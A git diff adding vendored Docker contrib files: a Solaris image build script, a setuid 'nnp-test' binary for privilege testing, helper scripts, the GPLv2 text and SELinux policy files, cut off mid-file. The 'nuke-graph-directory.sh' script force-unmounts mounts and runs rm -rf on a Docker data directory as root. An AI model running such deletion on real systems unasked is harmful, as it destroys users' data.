+#!/usr/bin/env bash +# +# Solaris 12 base image build script. +# +set -e + +# TODO add optional package publisher origin + +rootfsDir="$1" +shift + +# base install +( + set -x + + pkg image-create --full --zone \ + --facet facet.locale.*=false \ + --facet facet.locale.POSIX=true \ + --facet facet.doc=false \ + --facet facet.doc.*=false \ + "$rootfsDir" + + pkg -R "$rootfsDir" set-property use-system-repo true + + pkg -R "$rootfsDir" set-property flush-content-cache-on-success true + + pkg -R "$rootfsDir" install core-os +) + +# Lay in stock configuration, set up milestone +# XXX This all may become optional in a base image +( + # faster to build repository database on tmpfs + REPO_DB=/system/volatile/repository.$$ + export SVCCFG_REPOSITORY=${REPO_DB} + export SVCCFG_DOOR_PATH=$rootfsDir/system/volatile/tmp_repo_door + + # Import base manifests. NOTE These are a combination of basic requirement + # and gleaned from container milestone manifest. They may change. + for m in $rootfsDir/lib/svc/manifest/system/environment.xml \ + $rootfsDir/lib/svc/manifest/system/svc/global.xml \ + $rootfsDir/lib/svc/manifest/system/svc/restarter.xml \ + $rootfsDir/lib/svc/manifest/network/dns/client.xml \ + $rootfsDir/lib/svc/manifest/system/name-service/switch.xml \ + $rootfsDir/lib/svc/manifest/system/name-service/cache.xml \ + $rootfsDir/lib/svc/manifest/milestone/container.xml ; do + svccfg import $m + done + + # Apply system layer profile, deleting unnecessary dependencies + svccfg apply $rootfsDir/etc/svc/profile/generic_container.xml + + # XXX Even if we keep a repo in the base image, this is definitely optional + svccfg apply $rootfsDir/etc/svc/profile/sysconfig/container_sc.xml + + for s in svc:/system/svc/restarter \ + svc:/system/environment \ + svc:/network/dns/client \ + svc:/system/name-service/switch \ + svc:/system/name-service/cache \ + svc:/system/svc/global \ + svc:/milestone/container ;do + svccfg -s $s refresh + done + + # now copy the built up repository into the base rootfs + mv $REPO_DB $rootfsDir/etc/svc/repository.db +) + +# pkg(1) needs the zoneproxy-client running in the container. +# use a simple wrapper to run it as needed. +# XXX maybe we go back to running this in SMF? +mv "$rootfsDir/usr/bin/pkg" "$rootfsDir/usr/bin/wrapped_pkg" +cat > "$rootfsDir/usr/bin/pkg" <<-'EOF' +#!/bin/sh +# +# THIS FILE CREATED DURING DOCKER BASE IMAGE CREATION +# +# The Solaris base image uses the sysrepo proxy mechanism. The +# IPS client pkg(1) requires the zoneproxy-client to reach the +# remote publisher origins through the host. This wrapper script +# enables and disables the proxy client as needed. This is a +# temporary solution. + +/usr/lib/zones/zoneproxy-client -s localhost:1008 +PKG_SYSREPO_URL=http://localhost:1008 /usr/bin/wrapped_pkg "$@" +pkill -9 zoneproxy-client +EOF +chmod +x "$rootfsDir/usr/bin/pkg" diff --git a/vendor/github.com/docker/docker/contrib/nnp-test/Dockerfile b/vendor/github.com/docker/docker/contrib/nnp-test/Dockerfile new file mode 100644 index 0000000000..026d86954f --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/nnp-test/Dockerfile @@ -0,0 +1,9 @@ +FROM buildpack-deps:jessie + +COPY . /usr/src/ + +WORKDIR /usr/src/ + +RUN gcc -g -Wall -static nnp-test.c -o /usr/bin/nnp-test + +RUN chmod +s /usr/bin/nnp-test diff --git a/vendor/github.com/docker/docker/contrib/nnp-test/nnp-test.c b/vendor/github.com/docker/docker/contrib/nnp-test/nnp-test.c new file mode 100644 index 0000000000..b767da7e1a --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/nnp-test/nnp-test.c @@ -0,0 +1,10 @@ +#include +#include +#include + +int main(int argc, char *argv[]) +{ + printf("EUID=%d\n", geteuid()); + return 0; +} + diff --git a/vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh b/vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh new file mode 100755 index 0000000000..5eeb45c8bd --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh @@ -0,0 +1,64 @@ +#!/bin/sh +set -e + +dir="$1" + +if [ -z "$dir" ]; then + { + echo 'This script is for destroying old /var/lib/docker directories more safely than' + echo ' "rm -rf", which can cause data loss or other serious issues.' + echo + echo "usage: $0 directory" + echo " ie: $0 /var/lib/docker" + } >&2 + exit 1 +fi + +if [ "$(id -u)" != 0 ]; then + echo >&2 "error: $0 must be run as root" + exit 1 +fi + +if [ ! -d "$dir" ]; then + echo >&2 "error: $dir is not a directory" + exit 1 +fi + +dir="$(readlink -f "$dir")" + +echo +echo "Nuking $dir ..." +echo ' (if this is wrong, press Ctrl+C NOW!)' +echo + +( set -x; sleep 10 ) +echo + +dir_in_dir() { + inner="$1" + outer="$2" + [ "${inner#$outer}" != "$inner" ] +} + +# let's start by unmounting any submounts in $dir +# (like -v /home:... for example - DON'T DELETE MY HOME DIRECTORY BRU!) +for mount in $(awk '{ print $5 }' /proc/self/mountinfo); do + mount="$(readlink -f "$mount" || true)" + if [ "$dir" != "$mount" ] && dir_in_dir "$mount" "$dir"; then + ( set -x; umount -f "$mount" ) + fi +done + +# now, let's go destroy individual btrfs subvolumes, if any exist +if command -v btrfs > /dev/null 2>&1; then + # Find btrfs subvolumes under $dir checking for inode 256 + # Source: http://stackoverflow.com/a/32865333 + for subvol in $(find "$dir" -type d -inum 256 | sort -r); do + if [ "$dir" != "$subvol" ]; then + ( set -x; btrfs subvolume delete "$subvol" ) + fi + done +fi + +# finally, DESTROY ALL THINGS +( shopt -s dotglob; set -x; rm -rf "$dir"/* ) diff --git a/vendor/github.com/docker/docker/contrib/project-stats.sh b/vendor/github.com/docker/docker/contrib/project-stats.sh new file mode 100755 index 0000000000..2691c72ffb --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/project-stats.sh @@ -0,0 +1,22 @@ +#!/usr/bin/env bash + +## Run this script from the root of the docker repository +## to query project stats useful to the maintainers. +## You will need to install `pulls` and `issues` from +## https://github.com/crosbymichael/pulls + +set -e + +echo -n "Open pulls: " +PULLS=$(pulls | wc -l); let PULLS=$PULLS-1 +echo $PULLS + +echo -n "Pulls alru: " +pulls alru + +echo -n "Open issues: " +ISSUES=$(issues list | wc -l); let ISSUES=$ISSUES-1 +echo $ISSUES + +echo -n "Issues alru: " +issues alru diff --git a/vendor/github.com/docker/docker/contrib/report-issue.sh b/vendor/github.com/docker/docker/contrib/report-issue.sh new file mode 100755 index 0000000000..cb54f1a5bc --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/report-issue.sh @@ -0,0 +1,105 @@ +#!/bin/sh + +# This is a convenience script for reporting issues that include a base +# template of information. See https://github.com/docker/docker/pull/8845 + +set -e + +DOCKER_ISSUE_URL=${DOCKER_ISSUE_URL:-"https://github.com/docker/docker/issues/new"} +DOCKER_ISSUE_NAME_PREFIX=${DOCKER_ISSUE_NAME_PREFIX:-"Report: "} +DOCKER=${DOCKER:-"docker"} +DOCKER_COMMAND="${DOCKER}" +export DOCKER_COMMAND + +# pulled from https://gist.github.com/cdown/1163649 +function urlencode() { + # urlencode + + local length="${#1}" + for (( i = 0; i < length; i++ )); do + local c="${1:i:1}" + case $c in + [a-zA-Z0-9.~_-]) printf "$c" ;; + *) printf '%%%02X' "'$c" + esac + done +} + +function template() { +# this should always match the template from CONTRIBUTING.md + cat <<- EOM + Description of problem: + + + \`docker version\`: + `${DOCKER_COMMAND} -D version` + + + \`docker info\`: + `${DOCKER_COMMAND} -D info` + + + \`uname -a\`: + `uname -a` + + + Environment details (AWS, VirtualBox, physical, etc.): + + + How reproducible: + + + Steps to Reproduce: + 1. + 2. + 3. + + + Actual Results: + + + Expected Results: + + + Additional info: + + + EOM +} + +function format_issue_url() { + if [ ${#@} -ne 2 ] ; then + return 1 + fi + local issue_name=$(urlencode "${DOCKER_ISSUE_NAME_PREFIX}${1}") + local issue_body=$(urlencode "${2}") + echo "${DOCKER_ISSUE_URL}?title=${issue_name}&body=${issue_body}" +} + + +echo -ne "Do you use \`sudo\` to call docker? [y|N]: " +read -r -n 1 use_sudo +echo "" + +if [ "x${use_sudo}" = "xy" -o "x${use_sudo}" = "xY" ]; then + export DOCKER_COMMAND="sudo ${DOCKER}" +fi + +echo -ne "Title of new issue?: " +read -r issue_title +echo "" + +issue_url=$(format_issue_url "${issue_title}" "$(template)") + +if which xdg-open 2>/dev/null >/dev/null ; then + echo -ne "Would like to launch this report in your browser? [Y|n]: " + read -r -n 1 launch_now + echo "" + + if [ "${launch_now}" != "n" -a "${launch_now}" != "N" ]; then + xdg-open "${issue_url}" + fi +fi + +echo "If you would like to manually open the url, you can open this link if your browser: ${issue_url}" + diff --git a/vendor/github.com/docker/docker/contrib/reprepro/suites.sh b/vendor/github.com/docker/docker/contrib/reprepro/suites.sh new file mode 100755 index 0000000000..9ecf99d465 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/reprepro/suites.sh @@ -0,0 +1,12 @@ +#!/bin/bash +set -e + +cd "$(dirname "$BASH_SOURCE")/../.." + +targets_from() { + git fetch -q https://github.com/docker/docker.git "$1" + git ls-tree -r --name-only "$(git rev-parse FETCH_HEAD)" contrib/builder/deb/ | grep '/Dockerfile$' | sed -r 's!^contrib/builder/deb/|^contrib/builder/deb/amd64/|-debootstrap|/Dockerfile$!!g' | grep -v / +} + +release_branch=$(git ls-remote --heads https://github.com/docker/docker.git | awk -F 'refs/heads/' '$2 ~ /^release/ { print $2 }' | sort -V | tail -1) +{ targets_from master; targets_from "$release_branch"; } | sort -u diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE new file mode 100644 index 0000000000..d511905c16 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE @@ -0,0 +1,339 @@ + GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Lesser General Public License instead.) You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. + + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. + + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. + +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. (This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. + +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties to +this License. + + 7. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. + +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License along + with this program; if not, write to the Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. + +Also add information on how to contact you by electronic and paper mail. + +If the program is interactive, make it output a short notice like this +when it starts in an interactive mode: + + Gnomovision version 69, Copyright (C) year name of author + Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, the commands you use may +be called something other than `show w' and `show c'; they could even be +mouse-clicks or menu items--whatever suits your program. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the program, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the program + `Gnomovision' (which makes passes at compilers) written by James Hacker. + + , 1 April 1989 + Ty Coon, President of Vice + +This General Public License does not permit incorporating your program into +proprietary programs. If your program is a subroutine library, you may +consider it more useful to permit linking proprietary applications with the +library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile new file mode 100644 index 0000000000..16df33ef32 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile @@ -0,0 +1,23 @@ +TARGETS?=docker +MODULES?=${TARGETS:=.pp.bz2} +SHAREDIR?=/usr/share + +all: ${TARGETS:=.pp.bz2} + +%.pp.bz2: %.pp + @echo Compressing $^ -\> $@ + bzip2 -9 $^ + +%.pp: %.te + make -f ${SHAREDIR}/selinux/devel/Makefile $@ + +clean: + rm -f *~ *.tc *.pp *.pp.bz2 + rm -rf tmp *.tar.gz + +man: install + sepolicy manpage --domain ${TARGETS}_t + +install: + semodule -i ${TARGETS} + diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md new file mode 100644 index 0000000000..7ea3117a89 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md @@ -0,0 +1 @@ +SELinux policy for docker diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc new file mode 100644 index 0000000000..d6cb0e5792 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc @@ -0,0 +1,29 @@ +/root/\.docker gen_context(system_u:object_r:docker_home_t,s0) + +/usr/bin/docker -- gen_context(system_u:object_r:docker_exec_t,s0) +/usr/bin/docker-novolume-plugin -- gen_context(system_u:object_r:docker_auth_exec_t,s0) +/usr/lib/docker/docker-novolume-plugin -- gen_context(system_u:object_r:docker_auth_exec_t,s0) + +/usr/lib/systemd/system/docker.service -- gen_context(system_u:object_r:docker_unit_file_t,s0) +/usr/lib/systemd/system/docker-novolume-plugin.service -- gen_context(system_u:object_r:docker_unit_file_t,s0) + +/etc/docker(/.*)? gen_context(system_u:object_r:docker_config_t,s0) + +/var/lib/docker(/.*)? gen_context(system_u:object_r:docker_var_lib_t,s0) +/var/lib/kublet(/.*)? gen_context(system_u:object_r:docker_var_lib_t,s0) +/var/lib/docker/vfs(/.*)? gen_context(system_u:object_r:svirt_sandbox_file_t,s0) + +/var/run/docker(/.*)? gen_context(system_u:object_r:docker_var_run_t,s0) +/var/run/docker\.pid -- gen_context(system_u:object_r:docker_var_run_t,s0) +/var/run/docker\.sock -s gen_context(system_u:object_r:docker_var_run_t,s0) +/var/run/docker-client(/.*)? gen_context(system_u:object_r:docker_var_run_t,s0) +/var/run/docker/plugins(/.*)? gen_context(system_u:object_r:docker_plugin_var_run_t,s0) + +/var/lock/lxc(/.*)? gen_context(system_u:object_r:docker_lock_t,s0) + +/var/log/lxc(/.*)? gen_context(system_u:object_r:docker_log_t,s0) + +/var/lib/docker/init(/.*)? gen_context(system_u:object_r:docker_share_t,s0) +/var/lib/docker/containers/.*/hosts gen_context(system_u:object_r:docker_share_t,s0) +/var/lib/docker/containers/.*/hostname gen_context(system_u:object_r:docker_share_t,s0) +/var/lib/docker/.*/config\.env gen_context(system_u:object_r:docker_share_t,s0) diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if new file mode 100644 index 0000000000..e087e8b98b --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if @@ -0,0 +1,523 @@ + +## The open-source application container engine. + +######################################## +## +## Execute docker in the docker domain. +## +## +## +## Domain allowed to transition. +## +## +# +interface(`docker_domtrans',` + gen_require(` + type docker_t, docker_exec_t; + ') + + corecmd_search_bin($1) + domtrans_pattern($1, docker_exec_t, docker_t) +') + +######################################## +## +## Execute docker in the caller domain. +## +## +## +## Domain allowed to transition. +## +## +# +interface(`docker_exec',` + gen_require(` + type docker_exec_t; + ') + + corecmd_search_bin($1) + can_exec($1, docker_exec_t) +') + +######################################## +## +## Search docker lib directories. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_search_lib',` + gen_require(` + type docker_var_lib_t; + ') + + allow $1 docker_var_lib_t:dir search_dir_perms; + files_search_var_lib($1) +') + +######################################## +## +## Execute docker lib directories. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_exec_lib',` + gen_require(` + type docker_var_lib_t; + ') + + allow $1 docker_var_lib_t:dir search_dir_perms; + can_exec($1, docker_var_lib_t) +') + +######################################## +## +## Read docker lib files. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_read_lib_files',` + gen_require(` + type docker_var_lib_t; + ') + + files_search_var_lib($1) + read_files_pattern($1, docker_var_lib_t, docker_var_lib_t) +') + +######################################## +## +## Read docker share files. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_read_share_files',` + gen_require(` + type docker_share_t; + ') + + files_search_var_lib($1) + list_dirs_pattern($1, docker_share_t, docker_share_t) + read_files_pattern($1, docker_share_t, docker_share_t) + read_lnk_files_pattern($1, docker_share_t, docker_share_t) +') + +###################################### +## +## Allow the specified domain to execute apache +## in the caller domain. +## +## +## +## Domain allowed access. +## +## +# +interface(`apache_exec',` + gen_require(` + type httpd_exec_t; + ') + + can_exec($1, httpd_exec_t) +') + +###################################### +## +## Allow the specified domain to execute docker shared files +## in the caller domain. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_exec_share_files',` + gen_require(` + type docker_share_t; + ') + + can_exec($1, docker_share_t) +') + +######################################## +## +## Manage docker lib files. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_manage_lib_files',` + gen_require(` + type docker_var_lib_t; + ') + + files_search_var_lib($1) + manage_files_pattern($1, docker_var_lib_t, docker_var_lib_t) + manage_lnk_files_pattern($1, docker_var_lib_t, docker_var_lib_t) +') + +######################################## +## +## Manage docker lib directories. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_manage_lib_dirs',` + gen_require(` + type docker_var_lib_t; + ') + + files_search_var_lib($1) + manage_dirs_pattern($1, docker_var_lib_t, docker_var_lib_t) +') + +######################################## +## +## Create objects in a docker var lib directory +## with an automatic type transition to +## a specified private type. +## +## +## +## Domain allowed access. +## +## +## +## +## The type of the object to create. +## +## +## +## +## The class of the object to be created. +## +## +## +## +## The name of the object being created. +## +## +# +interface(`docker_lib_filetrans',` + gen_require(` + type docker_var_lib_t; + ') + + filetrans_pattern($1, docker_var_lib_t, $2, $3, $4) +') + +######################################## +## +## Read docker PID files. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_read_pid_files',` + gen_require(` + type docker_var_run_t; + ') + + files_search_pids($1) + read_files_pattern($1, docker_var_run_t, docker_var_run_t) +') + +######################################## +## +## Execute docker server in the docker domain. +## +## +## +## Domain allowed to transition. +## +## +# +interface(`docker_systemctl',` + gen_require(` + type docker_t; + type docker_unit_file_t; + ') + + systemd_exec_systemctl($1) + init_reload_services($1) + systemd_read_fifo_file_passwd_run($1) + allow $1 docker_unit_file_t:file read_file_perms; + allow $1 docker_unit_file_t:service manage_service_perms; + + ps_process_pattern($1, docker_t) +') + +######################################## +## +## Read and write docker shared memory. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_rw_sem',` + gen_require(` + type docker_t; + ') + + allow $1 docker_t:sem rw_sem_perms; +') + +####################################### +## +## Read and write the docker pty type. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_use_ptys',` + gen_require(` + type docker_devpts_t; + ') + + allow $1 docker_devpts_t:chr_file rw_term_perms; +') + +####################################### +## +## Allow domain to create docker content +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_filetrans_named_content',` + + gen_require(` + type docker_var_lib_t; + type docker_share_t; + type docker_log_t; + type docker_var_run_t; + type docker_home_t; + ') + + files_pid_filetrans($1, docker_var_run_t, file, "docker.pid") + files_pid_filetrans($1, docker_var_run_t, sock_file, "docker.sock") + files_pid_filetrans($1, docker_var_run_t, dir, "docker-client") + logging_log_filetrans($1, docker_log_t, dir, "lxc") + files_var_lib_filetrans($1, docker_var_lib_t, dir, "docker") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "config.env") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hosts") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hostname") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "resolv.conf") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, dir, "init") + userdom_admin_home_dir_filetrans($1, 